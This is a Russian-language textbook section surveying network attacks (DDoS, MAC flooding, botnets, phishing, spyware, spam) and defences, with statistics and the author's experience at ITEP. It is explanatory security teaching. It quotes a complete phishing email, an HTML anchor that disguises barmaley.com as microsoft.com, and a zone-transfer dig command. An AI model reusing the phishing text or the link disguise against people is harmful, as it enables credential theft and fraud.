UP: 6.3 Система Firewall     Next: 6.3.2 Средства противодействия атакам

6.3.1 Обзор уязвимостей, некоторых видов атак и средств защиты

Семенов Ю.А. (ИТЭФ-МФТИ)
Yu. Semenov (ITEP-MIPT)

Введение

В двадцать первом веке движущей силой и главным объектом всех отраслей человеческой деятельности станановится информация, и состояние каналов, сетей и безопасность серверов станут основой экономического развития. По мнению некоторых экспертов информация становится главной международной валютой. К сожалению, сложные сетевые технологии достаточно уязвимы для целенаправленных атак. Причем такие атаки могут производиться удаленно, в том числе и из-за пределов национальных границ. Все это ставит новые проблемы перед разработчиками и строителями информационной инфраструктуры. Некоторые современные формы бизнеса полностью базируются на сетевых технологиях (электронная торговля, IP-телефония, сетевое провайдерство и т.д.) и по этой причине особенно уязвимы. В 2009 году на повестку дня встала проблема унификации методики названия различных видов вредоносных кодов. Потребуется здесь и международное сотрудничество в сфере законодательства и установления барьеров для сетевых террористов. Не исключено, что придется со временем модифицировать с учетом требований безопасности некоторые протоколы и программы. Аргументом в пользу актуальности проблем безопасности может стать карта мира, отображающая число атак сети Межведомственного Суперкомпьютерного центра РАН. Цифры на карте отмечают число атак сети за час из соответствующей страны. Время от времени интенсивность атак возрастает в несколько раз.

58% всех приложений обречены быть “неприемлемыми” с точки зрения сетевой безопасности. Большая часть таких программ написана не профессионалами. При этом практика показала, что программы с открытыми кодами безопаснее, чем самодельные.

Нужно иметь в виду, что в современной машине вредоносные коды могут находиться не только на дисках или в оперативной памяти, на флэшках или CD, но и в чипах управления внешних устройств, в BIOS и т.д..

Сетевые угрозы исходят не только от хакеров. Проблемы может вызвать вполне добросовестный сетевой администратор. Например, в окрябре 2009 года весь шведский Интернет (зона .se) на целый час перестал работать из-за опечатки администратора, который редактировал записи DNS-сервера.

Число атак сети МСЦ РАН за один час. На нижней диаграмме показано географическое распределение атак. Самые большие красные квадратики соответствуют более 1000атак/час.

Основным источником сетевых уязвимостей являются дефекты программ и особенности каналов связи:

• Коды операционной системы (например, уязвимость для переполнения памяти, некорректная работа с блокирующими сокетами, управление обновлениями ОС и т.д.)
• Транспортные протоколы (правила написания кодов), например, протокол IM, ТСР, DNS, SMTP или ICMP.
• Дефекты прикладных программ (firmware, например, Apache)
• Ошибки в программах пользователя (они встречаются чаще всего, но так как тексты таких программ не известны, хакерам с ними работать сложно и неэффективно, в отличии от трех предыдущих пунктов).
• Программы, встроены в аппаратные устройства, например в маршрутизаторы, BIOS, контроллеры или процессоры.
• Подбор паролей.
• Мобильные носители (флэш-память, DVD и пр.), Laptop, iPhone.
• Перехват сообщений и управления в беспроводных системах.
• Атаки типа "человек-по-середине".

Данные, представленные в таблице ниже, взяты в основном из материала WWW. World Wide Weaponization.

Операторы ботнет, называемые также “bot-фермерами,” используют самые разные методы для построения своих вредоносных сетей. Обычно в число таких инструментов входит: почтовые вирусы, сетевые черви, техника drive-by download, троянские кони. Типичным примером можно считать сеть Koobface, через которую было заражено более 2.9 миллионов машин. Операторы Koobface для распространения вредоносных кодов активно использовали социальные сети Facebook, Twitter и MySpace. Обычная технология включает в себя попытку заинтересовать потенциальную жертву интересной информацией, переадресацию на вредоносных сайт (при этом часто используются методы социалльной инженерии и психологии), после чего клиент может получить предложение обновить Adobe Flash Player или кодек. Если клиент соглашается и кликает на соответствующей ссылке, производилась загрузка вредоносного кода на его машину.

В последние десять лет число идентифицированных уязвимостей увеличивалось в среднем более чем на 50% ежегодно (смотри Eight Question to Ask about Your Intrusion-Security Solution).

Если несколько лет назад атаки на сетевые объекты совершали в основном (около 90%) хулиганы, которые таким образом пытались самоутвердиться, сейчас вторжения на серверы и рабочие станции предпринимаются уже с корыстной целью (см. Лаборатория Касперского). Речь не идет о вторжениях в банки (хотя и это бывает), все много прозаичнее, хакер взламывает большое число машин, выбирая наиболее уязвимые, и формирует базис для распределенных сетевых атак отказа обслуживания (DDoS - Distributed Denial of Service) на сервис-провайдеров или серверы фирм (заказы поступают от конкурентов), или для рассылки СПАМ’а, что стало в нашей стране достаточно прибыльным и относительно безопасным бизнесом. К концу 2009 года предельные потоки DDoS-атак достигли 49 Гбит/c ! Для DDoS атаки сервера WilkiLeaks (www.wikileaks.org и cablegate.wikileaks.org опубликовавшего дипломатическую переписку и другие конфиденциальные данные) использован поток, превосходящий 10Гбит/c. DDoS-атаки стали одним из видов кибероружия. Наиболее известным программным средством для DDoS-атак является LOIC (Low Orbit Ion Cannon).

Мы в ИТЭФ были вынуждены заниматься проблемами сетевой безопасности с 1995 года, когда несколько раз подверглись DoS-атакам. Сначала мы даже не знали, что происходит. Наш маршрутизатор CISCO-4000 был достаточно тихоходен и при потоках более 2000 пакетов в секунду самоблокировался. Не имея специальных средств и навыков, мы на диагностику проблемы в начале тратили более суток. Связано это с тем, что DoS-атаки чаще всего предпринимаются с использование фальсификации адреса отправителя. Две атаки были предприняты с ЭВМ из нашей локальной сети, взломанных ранее. Позднее такие объекты мы научились локализовать за несколько минут. Для этого была написана специальная программа. Алгоритм этой программы доложен на конференции МаБИТ-03, МГУ октябрь 2003 год.

Для организации DDoS-атак обычно используется протокол UDP (хотя это и не является обязательным).

Но описанные атаки были вторичными. Для нас оставалось не ясным, как взламывались ЭВМ-жертвы в нашей локальной сети. Чтобы прояснить эту проблему, мы поставили на входе сети ЭВМ, на которой сначала стояла программа t-meter, а позднее sniffer. Варьируя критерии отбора пакетов, мы смогли выявить IP-адреса машин, с которых производится сканирование адресов и портов ЭВМ нашей сети. В настоящее время число атак из расчета на одну ЭВМ превышает 20-100/сутки. В настоящее время мы анализируем поток атак на Межведомственный Суперкомпьютерный центр РАН. Для этого используется программа SNORT. При этом все данные об атаках автоматически записываются в базу данных, а по всем параметрам атаки строятся распределения (IP-адреса, порты, сигнатуры атак, время и т.д.)

Рост можности DoS-атак со временем (2002-2010гг)

В общем потоке атак DoS-атаки занимают до 27%, см. 2014. The Danger Deepens. Neustar Annual DDoS Attacks and Impact Report.

MAC-flooding.

Атака MAC-flooding относится к классу разведовательных атак. Этот вид атаки может использоваться также в качестве DoS-атаки. Атакующая машина забивает переключатель (switch) огромным числом кадров с неверными MAC-адресами отправителя. Переключатели имеют ограниченную память для таблицы переадресации (МАС-порт) и при такой атаке таблица будет заполнена некорректными MAC-адресами, пришедшими от машины-атакера. При поступлении легального трафика из-за отсутствия соответствующих записей в таблице переадресации пакеты будут направляться на все выходы переключателя. В результате атакер, взломавший машину, которая реализует данную атаку, получит большое количество ценной для него информации. Кроме того, это может вызвать перегрузку каналов и самого переключателя.

Схема атаки MAC-flooding

Следует учитывать, что характер атак становится все более изощренным. Хакеры объединяются в клубы, издают журналы и продают хакерские CD. Сегодня крайне актуальным становится кооперирование их потенциальных жертв. Для профессиональных DDoS атак могут использоваться машины, взломанные ранее (зомби). Большие группы таких машин иногда называются армиями.

Обычно наибольшее внимание привлекают атаки из области вне локальной сети (SQL- или XSS-injection). Реально несравненно большую угрозу представляют визиты сотрудников в социальные сети (Facebook, Twitter и т.д.), e-mail phishing или drive-by download (так называетмые приглашенные атаки), а также атаки инсайдеров (сетевые объекты, работающие в области, защищенной сетевым экраном). В случае посещения вредоносного сайта киберпреступники могут просканировать машину жертвы на предмет наличия известных уязвимостей. Под инсайдером подразумеваются не только сотрудники, работающие в локальной сети, но также скомпрометированные машины LAN (например, посредством USB-флэшей или любых других переносимых носителей или laptop'ов). Классическим примером инсайдерской атаки является утечка данных госдепартаметна США, опубликованных на сервере WikiLeaks.

Ниже представлена диаграмма классификации угроз по степени их опасности. Смотри Unveiling the Security Illusion: the need for active network forensics. 95% посылаемых на WEB-сайты постов являются спамом или содержат вредоносные коды. 71% зараженных сайтов являются совершенно легальными (их создали не для заражения посетителей вредоносными кодами, данные конца 2009 года). 58% всех краж данных осуществляется через WEB-серверы.

Классификация различных угроз по их степени опасности

Впрочем, самыми опасными остаются неизвестные атаки неизвестного типа - атаки нулевого дня.

Эволюция вредоносности атак со временем

На рисунке выше видно, что все началось с сетевого хулиганства, стимулом которого было самоутверждение, (до 2004г это в основном вирусы и сетевые черви), а к 2010 году все вышло на высокий профессиональный уровень, где двигателем является алчность или политика, (APT, динамические, многофункциональные троянские кони и botnet c элементами стэлз).

Самое ужасное, потенциально опасные программные продукты стали разрабатывать вполне добропорядочные компании. Они это делают для реализации виртуальной рекламы своих продуктов, для получения данных о своих клиентах (их предпочтениях). Становится все труднее обнаружить отличие между чисто хакерскими творениями и такими встроенными объектами в совершенно нормальные программные приложения. Существует и российская фирма, специализирующаяся на разработке хакерских программ. РФ наверное единственная страна, где бизнесмены могут легально вести такой бизнес.

Некоторые компании стали разрабатывать вредоносные программы на продажу, например, Mpack. Компания DTC (Dream Coders Team) продает этот продукт по цене до 1000$. При этом предлагается даже послепродажное обслуживание и обновление арсенала атак. Они утверждают, что это исследовательская программа, что-то вроде Nessus. В крайнем случае они оправдываются тем, что торгуют же люди оружием...

Согласно данным на начало 2007 года, если машина, подключенная к Интернет, остается незащищенной в течение 30 минут, с 50% вероятностью она окажется взломанной (станет зомби). В настоящее время по данным института SANS в мире существует около 3-3,5 миллионов таких зомби (и их число стремительно растет). Спрос на такие машины достаточно велик (для рассылки SPAM), цена 20000 машин зомби колеблется от 2 до 3 тысяч долларов США (и имеет тенденцию к падению из-за массовости производства). Машины делятся на группы примерно 20 ЭВМ в каждой и эти группы активируются поочередно. Каждая машина посылает по 630 сообщений в час. Именно это обстоятельство может свидетельствовать о том, что машина является зомби, ведь вряд ли кто-то способен подготовить и послать столько сообщения за час. По данным ФБР (США) ежегодний ущерб от киберпреступлений превышает 67 миллиардов долларов.

В мае 2006 года 21-летний Джинсон Джеймс Анчета (Ancheta) из пригорода Лос Анжелеса был приговорен к 57 месяцам тюрьмы и штрафу в 15000$ за создание сети машин-зомби с суммарным числом машин 400000. Некоторые взломанные им машины принадлежали центру вооружений моской авиации США в Калифорнии. Анчета занимался продажей взломанных машин, рекламируя свой "товар" через Internet Relay Channel.

Мало зарегистрировать атаку, надо определить и корректно интерпретировать IP-адрес, откуда эта атака исходит. Чаще всего, имея IP-адрес, достаточно легко отследить путь атаки, например посредством Trace Route. Полезным может оказаться утилита NSLookup, а также служба Whois, которая позволяет определить сервис-провайдера атакера и его географическое положение. Существуют и специальные утилиты (базы данных), позволяющие с достаточной точностью определить географическое положение машины по ее IP-адресу (например, GeoIP). Но хакеры знают о таких возможностях и часто используют анонимные прокси-серверы, чтобы скрыть свой IP-адрес. Такие серверы могут создаваться на взломанных ранее машинах-зомби. Только легкомысленный хакер станет атаковать какой-либо сетевой объект со своей машины, при любой возможности он будет атаковать с машины-зомби, доступ к которой можно купить.

Но существует класс атак с фальсификацией адреса отправителя, когда задачу определения IP-птпкера решить затруднительно. Эта техника используется большинством атак отказа обслуживания (DoS), а также некоторыми другими (смотри RFC-2827 или http://book.itep.ru/6/rfc2827.htm).

Многие атакеры используют социальную инженерию и психологию, чтобы спровоцировать потенциальную жертву к действиям, которые нанесут ущерб. Например, год назад в ИТЭФ пришли письма, которые, если верить заголовку были посланы сетевым администратором. Приложение к письму было заархивировано, но для дезархивации требовался ключ, который содержался в тексте письма. В самом письме говорилось, что приложение, содержит инструкцию по улучшению безопасности. Почтовый сервер ИТЭФ имеет антивирусную защиту. Но зашифрованность приложения препятствовала распознаванию сигнатуры вируса. Хотя здравый смысл подсказывает, что сетевому администратору не нужно шифровать сообщение, адресованное клиентам сети, среди пользователей нашлось около десятка простаков, которые попались на эту удочку.

Потенциальную угрозу безопасности могут представлять специальные вставки во встроенное программное обеспечение процессора, BIOS, аппаратную память микросхем-драйверов внешних устройств, операционной системы и приложений. Аналогичные угрозы представляют любые программы с неизвестными исходными кодами, включая обеспечение маршрутизаторов. Считывать данные можно путем регистрации электромагнитного излучения дисплея и других устройств ЭВМ, и даже анализируя звук при нажатии терминальных клавиш. Этим список способов несанкционированного доступа не исчерпывается. Но эти угрозы здесь не будут рассматриваться.

Число зарегистрированных сетевых вторжений в 2004 году превысило 200000. За 2004-ый год зарегистрировано 523×10⁹ сетевых инцидентов (мониторинг 450 сетей в 35 странах, см. http://www.acmqueue.com/modules.php). За период с 2001 по 2003 годы число зарегистрированных компьютерных преступлений в России удваивалось каждый год. Считается, что 80% компьютерных преступлений не попадает в официальную статистику, так как жертвы боятся огласки, которая может подорвать к ним доверие партнеров и клиентов. В этом убедился Citibank в 1995 году после успешной атаки российского хакера, когда последствия публикации факта атаки принесли больший вред, чем сама атака. Но в последнее время, в частности в США (Калифорния), закон требует немедленного обнародования факта кражи персональной информации.

Если имеется несколько ЭВМ, объединенных в систему, и к этой системе имеет доступ определенное число удаленных клиентов, то наиболее уязвимыми являются соединения клиентов с этой системой. Хакеры стараются атаковать самое слабое звено в системе. Особенно уязвимы пользовательские, домашние ЭВМ. Зная это, некоторые банки предлагают своим клиентам удешевленные или даже бесплатные средства защиты (например, антивирусные программы). Некоторые корпорации и сервис-провайдеры предоставляют своим клиентам антивирусные программы и firewall.

Принципы сигнатурного анализа сформировались в серидине 90-х годов прошлого века. Число сигнатур атак превысило 3000 к 2005 году и их многообразие продолжало лавинообразно увеличиваться, достигнув в 2009 году двадцати миллионного масштаба. Каждый месяц фиксируется порядка 5000 новых сигнатур (2009). Имеет место динамический прогресс системы щит-меч. С учетом полиморфизма проблемы перед разработчиками антивирусных и других аналогичных программ становятся все более сложными. Многие администраторы и хозяева сетей полагают, что до сих пор все обходилось, Бог даст, обойдется и впредь. Ведь у них на серверах нет соблазнительной информации, а фирма является небольшой, чтобы стать мишенью атаки. Такая позиция рано или поздно приведет к серьезным потерям. Это касается не только компаний, имеющим конкурентов (о них позаботятся непременно), или структур, имеющих на серверах конфиденциальную информацию (например, государственные учреждения), но и сетей, которые на первый взгляд не должны быть привлекательными для хакеров. Мы за счет большого числа машин в сети убеждались в этом уже не раз. Однажды были стерты несколько сот файлов общедоступного сервера http://book.itep.ru. Казалось бы какой в этом смысл? К счастью и меня была свежая резервная копия... Самое удивительное сервер продолжают атаковать, иногда по несколько тысяч раз в час (это уже на грани DoS-атаки). Хотя ничего привлекательного на сервере нет и вся информация является общедоступной.

Ниже рассмотрены некоторые наиболее опасные виды сетевых атак. Этот обзор не следует считать исчерпывающим, так как полный перечень занял бы целый том. Некоторые классы атак, например, использующие переполнение буфера или переполнение стека (а также heap overflow), являются составной частью многих видов вредоносных атак. Атаки переполнения имеют в свою очередь много разновидностей. Одна из наиболее опасных предполагает ввод в диалоговое окно помимо текста присоединенного к нему исполняемого кода. Такой ввод может привести к записи этого кода поверх исполняемой программы, что рано или поздно вызовет его исполнение. Последствия не трудно себе представить.

Уведомление о вирусном заражении сайта www.vt21.ru

С момента создания до момента обнаружения вируса проходят часы, дни, недели, а иногда и месяцы (в среднем около года). Это зависит от того, насколько быстро проявляются последствия заражения. Чем это время больше, тем большее число ЭВМ оказывается заражено. После выявления факта заражения и распространения новой разновидности вируса требуется от пары часов (например, для Email_Worm.Win32.Bagle.bj) до трех недель (W32.Netsky.N@mm) на выявление сигнатуры, создания противоядия и включения его сигнатуры в базу данных противовирусной программы. Временная диаграмма жизненного цикла вируса представлена на рис. 1A (" Network Security", v.2005, Issue 6, June 2005, p 16-18). Только за 2004 год зарегистрировано 10000 новых сигнатур вирусов. Червь Blaster заразил 90% машин за 10 минут. За это время антивирусная группа должна обнаружить объект, квалифицировать и разработать средство противодействия. Понятно, что это нереально. Так что антивирусная программа является не столько средством противодействия, сколько успокоительным. Эти же соображения справедливы и для всех других видов атак. Когда сигнатура атаки становится известной, сама атака обычно не опасна, так как уже выработаны средства противодействия и уязвимость перекрыта. Под сигнатурой здесь подразумевается некоторый характерный двоичный образ фрагмента кода. Именно по этой причине такое внимание уделяется системе управления программными обновлениями (пэтчами).

Под сигнатурой здесь подразумевается последовательность бит (в памяти или на жестком диске), которая характеризует вредоносный код. Распознаванию сигнатуры может препятствовать полиморфизм такого кода, т.е. вариабильность кода, сохраняющая его функциональность. Известно, что некоторые современные разновидности Malware (malicious software) перекомпилируют себя каждые 5 минут, внося в текст неисполняемые команды (NOP) и, таким образом, варьируя свою сигнатуру. Большинство антивирусных средств используют эвристические подходы, помогающие распознать вредоносный код, несмотря на его вариации. Одним из таких подходов является анализ действий (операций, поведения программы), выполняемых программой (например, модификация содержимого какого-то критического файла), а не ее сигнатуры.

Для управления машинами-зомби может использоваться протокол IRC (Internet Relay Chart), эта схема относится к централизованному типу. Cистема рассылки сообщений IRC поддерживается большим числом серверов и по этой причине этот канал обычно трудно отследить и запротоколировать. Этому способствует также то, что большинство систем более тщательно контролируют входной трафик, а не выходной. IRC-управление к началу 2010 года стало неэффективным (время жизни не более суток). Но и принципы управление типа peer-to-peer нейтрализуются достаточно быстро. Для управления botnet в последнее время стали применяться социальные сети. Следует иметь в виду, что зараженная машина может служить помимо DoS-атак, для сканирования других ЭВМ и рассылки SPAM, для хранения нелегальных программных продуктов, для управления самой машиной и кражи документов, хранящихся там, для выявления паролей и ключей, используемых хозяином. Для реализации централизованной схемы контроля может быть использован также протокол HTTP. Если выявить и заблокировать работу центрального сервера botnet, она прекратит свою работу, хотя все машины участницы останутся взломаны. Botnet с децентрализованной схемой управления (P2P) более устойчивы и по этой причине более опасны. Смотри также 10 answers to your questions about botnets. Чтобы представить себе структуру современных сетей botnet, посмотрите на рис. 1.

Рис. 1. Пример структуры связей современных сетей botnet (Blue Coat Security Labs)

Рис. 1A. Диаграмма жизни вируса при благоприятном сценарии

Следует постоянно помнить, что дополнительные WEB-сервисы (FTP, DNS, доступ к DB и т.д.) создают новые угрозы безопасности. Уязвимости обнаруживаются время от времени в широко используемых программах, например, Internet Explorer, Outlook и Outlook Express. Эти атаки для проникновения в систему используют переполнение буферов.

Khobe (Kernel Hook Bypassing Engine). В 2010 году появилась программа, позволяющая сегодня обойти практически все известные антивирусные защиты для Windows XP и Windows 7. Первое упоминание о такой возможности появилось в 2007 году. Эта программа использует уязвимости в службе таблиц дескрипторов ядра операционной системы (SSDT). Данная техника может быть скомбинирована с атакой на Acrobat Reader или Sun Java Virtual Machine. Принцип ее функционирования заключается в следующем. Сначала посылается абсолютно безвредный код, после того, как его безвредность антивирусной программой установлена, и до начала его исполнения этот код подменяется другим. В условиях, когда в системе параллельно исполняется много процессов, и один процесс, как правило не знает, что творит другой, такую операцию достаточно просто реализовать. Очевидно, что злоумышленник должен иметь возможность исполнять двоичный код на машине-жертве. Хороший повод напомнить - берегись инсайдеров. На рис. 1Б показан пример схемы, при которой инсайдер похищает средства компании.

Рис. 1Б. Упрощенная схема краж, осуществляемых инсайдером

Инсайдер формирует фальшивый счет и направляет ее в систему обработки. Позднее он одобряет оплату этого счета. Может показаться, что такая сжема может пройти только один раз. Но это не так. Во-первых, контроль всех электронных документов осуществляется не так часто, во-вторых, в эту схему обычно включается несколько человек (в том числе и внешних) или просто эту работу реализует частично или полностью вредоносная программа, установленная на сервере платежей. Факт кражи будет установлен лишь когда сумма станет значительной. Смотри "Monitoring, Detecting and Preventing Insider Fraud and Abuse" by Dan Sullivan или http://www.justice.gov/criminal/cybercrime/thomasIndict.htm.

WEB-страницы иногда имеют скрытые ссылки на конфиденциальные данные. Именно на это рассчитывают хакеры.

Phishing - получение паролей, PIN-кодов и пр. (последующая кража информации). Впервые этот вид атак зарегистрирован в 1996 году. Этот вид атаки начинается с рассылки почтовых сообщений, содержащих ссылку на известный ресурс (или имитирующий такую ссылку). Дизайн WEB-страницы обычно копируется с воспроизводимого ресурса. На фальсифицируемой странице может быть, например, написано, что банк, где вы имеете счет, проводит акцию по проверке безопасности доступа. Вам предлагается ввести номер вашей кредитной карты и PIN-код. Если вы это сделаете, злоумышленники сообщат, что все в порядке, а с вашего счета через некоторое время пропадут деньги. Но если это не сопряжено с банком, опасность такой атаки нисколько не уменьшается. Получив доступ к вашему акоунту, злоумышленники получат доступ к конфиденциальной информации и т.д. (смотри http://antiphishing.org/APWG_Phishing_Activity_Report_April_2005.pdf). Число атак типа phishing за апрель 2005 года составило 2854, месячный рост - около 15%. Хакер может прикинуться сотрудником организации и написать, что он забыл пароль. Служба администратора часто присылает новый пароль, не проверяя личность человека, приславшего запрос. Так терминалы иногда стоят в общедоступных помещениях, а сотрудник может ненадолго отойти от дисплея, не прерывая сессию, посторонний может сесть на его место, поменять пароль или загрузить троянского коня, получив доступ в систему. Злоумышленник может подсмотреть пароль и через плечо работающего легального пользователя. Хорошей практикой является отсутствие документов и тем более паролей на вашем рабочем столе. Длительная пауза в работе должна автоматически запирать дисплей. Критическая информация в laptop или notebook должна быть зашифрована. Одним из возможных средств атак является использование IDN (International Domain Name). Дело в том, что в системах, поддерживающих IDN, допускается использование букв национальных алфавитов, а, например, некоторые буквы латинского и русского алфавитов пишутся идентично. Этим могут воспользоваться злоумышленники, они могут зарегистрировать имена, которые выглядит как имена известной фирмы, например microsoft.com, где некоторые буквы заменены на русские, так что это внешне не заметно, например, буквы с или о. Тогда при ошибочной замене одной или нескольких букв на русские клиент попадет не на сайт компании Microsoft, а на внешне неотличимый от него сайт злоумышленника. В среднем электронные мошенничества наносит ущерб порядка 895$, частота же таких преступлений достаточно быстро растет. Пример подобного сообщения представлен ниже (я получил это сообщение на свой адрес в ЦЕРН (Женева)):

Dear Valued Customer, SmithBarney Citigroup, is committed to maintaining a safe environment for our customers. To protect the security of your account, SmithBarney Citigroup, employs some of the most advanced security systems in the world and our anti-fraud teams regularly screen the Citibank system for unusual activity. We are contacting you to remind you that on Nov. 28, 2004 our Account Review Team identified some unusual activity in your account. In accordance with SmithBarney's User Agreement and to ensure that your account has not been compromised, access to your account was limited. Your account access will remain limited until this issue has been resolved. We encourage you to log in and perform the steps necessary to restore your account access as soon as possible. Allowing your account access to remain limited for an extended period of time may result in further limitations on the use of your account and possible account closure.Visit now log on page and sign to account verification process:

https://www.smithbarney.com/login/login.cgi?redir=s

Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. We apologize for any inconvenience. Sincerely, SmithBarney Citigroup, Account Review Department.

Анализ инцидента показал, что произведена полная подмена страниц. Утилита Traceroute указывала на вроде бы легальный адрес в США...

При получении почтового сообщения, содержащего URL, возможна фальсификация адресов. Например написана ссылка www.microsoft.com, а на самом деле уход может происходить на адрес barmaley.com. Для этого можно записать URL в виде: <A href=http://barmaley.com>www.microsoft.com</a>. Хакер при этом может справедливо полагать, что читатель почтового сообщения не станет рассматривать HTML-код сообщения, а будет руководствоваться тем, что видит на экране.

Разновидностью такого рода атак является атака через DNS (или каким-то иным способом), когда страница известного URL подменяется страницей злоумышленника (spoofing).

При получении почты следует иметь в виду, что поле сообщения From: можно легко фальсифицировать. Хакер это может сделать для того, чтобы вы отнеслись с большим доверием к присланному сообщению. Протокол же SMTP и почтовые приложения не осуществляют проверку соответствия IP-адреса отправителя и поля From. Фильтрация сообщений по полю From предусмотрена лишь в программах AntiSPAM.

Традиционные программы antiSPAM не могут идентифицировать phishing-атаки. Такие сообщения не содержат ключевых слов, по которым детектируется SPAM (например, Viagra, pharmaceuticals или discount), они отправлены с адресов, еще не попавших в репутационные списки. Часто это адреса ваших хороших знакомых или коллег.

Особое внимание хакеров привлекают кэширующие серверы имен (CNS - Caching NameServer). См. DNS security best practices to prevent DNS poisoning attacks. При реализации рекурсивных запросов всегда есть возможность модификации запроса или отклика. Для решения этой проблемы был разработан протокол DNSSEC.

Сокращение имени субдомена DNS

Некоторые сервис-провайдеры по ряду причин используют сокращенные имена субдоменов DNS для обозначения названия своих сервисов (например, в Twitter или e-mail). В последнее время сокращенное имя URL сервиса is.gd использовалось достаточно активно для переадресации клиентов на phishing-сайты. За время активности (см. рис. 1B) на сайт поступило 50 млрд. запросов. Ниже приведен пример ссылки-переадресайии на вредоносный сайт:

http://is.gd/Tb###U?2.taobao.com/item.htm?spm=2007.1000337

Рис. 1B. Активность субдомена is.gd (данные Netcraft)

На рис. 1С приведены доли 5 ведущих URL, использованных для переадресации на phishing-сайты.

Рис. 1C. Доли сокращенных имен доменов, используемых для phishing-атак

Вывод прост сокращение имен доменов, используемых для названий сервисов, удобно, но почти всегда опасно для пользователей.

Чтобы быть в курсе того, что делается в вашем домене (здесь предполагается, что ваш домен имеет имя example.com), полезно время от времени использовать утилиту dig:

dig @a.iana-servers.net example.com axfr

Большую угрозу могут представлять фальсификации серверов обновления (WINDOWS, антивирусных библиотек и т.д.), так как при таком "обновлении" в ЭВМ жертвы может быть записана любая вредоносная программа. Сходную угрозу может представлять интерактивная игра, которая, например, при переходе с одного уровня на другой, предлагает загрузить некоторый программный модуль.

Эта программа, которая на вид имеет безобидное назначения, на самом деле содержbn определенные вредоносные функции. Она может фиксировать все нажатия клавиш на терминале или мышке, способна записывать screenshot'ы и передавать эти данные удаленному хозяину. Если на ЭВМ оказался установленным общеизвестный троянский конь, машина становится уязвимой. Именно с этим связано сканирование хакерами номеров портов известных троянских коней. Многие современные вирусы и черви могут загружать в зараженную ЭВМ троянского коня (или программу spyware), целью которого может быть не только получение паролей, но также номера кредитной карты и PIN-кода. В некоторых случаях зараженная машина может стать источником DoS-атаки. Исследования, проведенные в 2004 году, показали, что 90% РС имеют какой-то вид spyware (это не обязательно троянские кони). В среднем каждая ЭВМ содержит в себе до 26 разновидностей таких программ (возможно, это и преувеличение, но если вы не предпринимали специальных мер, как минимум одна такая программа в вашей ЭВМ имеется). Следует учитывать, что Spyware, имеют примерно те же возможности, что и троянский конь, встраиваются в другие программы и распространяется несколько другими методами. Программа троянский конь может рассылать себя другим машинам (как и сетевой червь). Кроме того, в отличие от троянских коней эти программы часто не обнаруживаются антивирусными программами. Смотри www.earthlink.net/about/press/pr_spyAudit, www.ssppyy.com и securityresponse.symantec.com. Программа "Троянский конь" обычно содержит в себе следующие секции:

• Переименование. Файлу, содержащему вредоносный код присваивается имя, которое напоминает одну из штатных программ системы.
• Разрушение. Секция мешает выявлять вредоносный код с помощью антивирусной программы.
• Полиморфный код. Программа, которая регулярно модифицирует сигнатуру вредоносного кода.

Функцией Spyware является сбор данных об активности вашей машины, о криптоключах, паролях и другой критической и конфиденциальной информации. Spyware.Ssppyy может попасть к вам вместе с поздравительной открыткой. Если хотя бы один пользователь откроет такую открытку, вся система окажется скомпрометированной. 80% данных Spyware отсылает своему хозяину по почте (порт=25), некоторые разновидности этих программ содержат в себе почтовый сервер. Расходы на противодействие spyware увеличиваются ежегодно примерно в пять раз. Сюда входят расходы на создание программ и обновление баз данных сигнатур spyware.

Симптомами приcутствия spyware в вашем компьютере могут служить следующие признаки: (см. Recognizing and Avoiding Spyware).

• Неспровацировано открываются окна
• Вас переадресуют на сайт, отличный от того, имя которого вы ввели
• В окне вашего браузера появляется иконка нового программного средства
• Появилась новая иконка в списке заданий в нижней части вашего экрана
• Изменилась базовая страница вашего браузера
• Изменилась страничка поисковой программы вашего браузера
• Перестали работать некоторые клавиши в вашем браузере (напр., клавиша табулятора)
• Появляются необъяснимые сообщения об ошибках
• Ваш компьютер неожиданно замедляет свою работу (например, при спасении файлов и т.д.)

Проверка моей машины с помощью программы BPS Spyware показала, что там содержится около 2000 таких программ (машина не сканировалась на предмет spyware); всего по результатам сканирования удалено 17825 объектов), но с момента инсталляции ОС на машине работала антивирусная программа. Последние полгода там работал ZoneAlarm. Полная очистка ЭВМ от spyware, размещенных в файлах, в cookies, в реестре и т.д. заняла достаточно много времени.

В последнее время троянские кони стали использоваться для отслеживания места пребывания хозяина машины (laptop). В перспективе, когда машины получат датчики GPS, эта задача существенно упростится.

Cookie содержит информацию о вашем имени, установках и предпочтениях при просмотре конкретного сайта. Эта информация заносится на ваш компьютер при просмотре этого сайта.

SPAM составляет до 90% полного объема почтовых сообщений. Сопряжено это с тем, что рассылка SPAM стала достаточно доходной частью полукриминального бизнеса. Это связано с потерями сетевых ресурсов, о времени получателей я уже не говорю. Часть таких сообщений часто заражена вирусами, червями или троянскими конями. Я, например, получаю до 300 таких сообщений в день. У меня есть специальный почтовый ящик, куда такие сообщения складываются. Эффективность современных фильтров SPAM достигает 90%. При этом следует учитывать, что такие фильтры сильно загружают серверы DNS. Для минимизации SPAM обычно рекомендуется иметь несколько почтовых адресов, например, один для частной переписки, один для деловой и один для информационных обменов, подписки и пр. Это облегчает распознавание SPAM. Полезно самому создавать уникальные адреса для каждого вида обменов и время от времени их менять (см. email.about.com/library/weekly. Это легко делать в случае подписных листов. Рекомендуется удалить свой почтовый адрес из своего WEB-сервера. Не рекомендуется покупать что-либо по рекомендациям SPAM-рассылок, тем более что в 95% случаях это могут оказаться недобросовестные поставщики. В последнее время для исключения распознавания SPAM по содержанию, отправители стали использовать графическую форму представления текста. Смотри также http://email.about.com/cs/spamfiltering, email.about.com/library/howto/htnegativespamfilter.htm, spam.abuse.net/spam/ и www.scambusters.org/stopspam/stop-spam.html. По данным Sophos 60% SPAM рассылается через взломанные ЭВМ. SPAM не только раздражает, съедая сетевые ресурсы, он делает бизнес менее эффективным. Представьте сколько времени сотрудники тратят на просмотр таких сообщений, сколько средств и ресурсов тратится на приобретение и обслуживание программ, фильтрующих почту, и вы поймете, что SPAM не безобиден и уже сегодня наносит ущерб более значительный, чем сетевые вирусы. Следует также учесть, что SPAM стал одним из основных средств рассылки троянских коней spyware, phishing и прочих разновидностей malware. В мае 2008 года ботнет Srizbi рассылала до 60 миллиардов SPAM-сообщений в сутки.

SPAM используется и для заражения машин вредоносными кодами. Для этой цели обычно применяются приложения со встроенными скриптами и другими опасными программами.

Разновидность SPAM, рассылаемая через IM, иногда называют SPIM.

“Пассивные” атаки с помощью, например, sniffer особенно опасны, так как, во-первых, практически недетектируемы, во-вторых, предпринимаются из локальной сети (внешний Firewall бессилен).

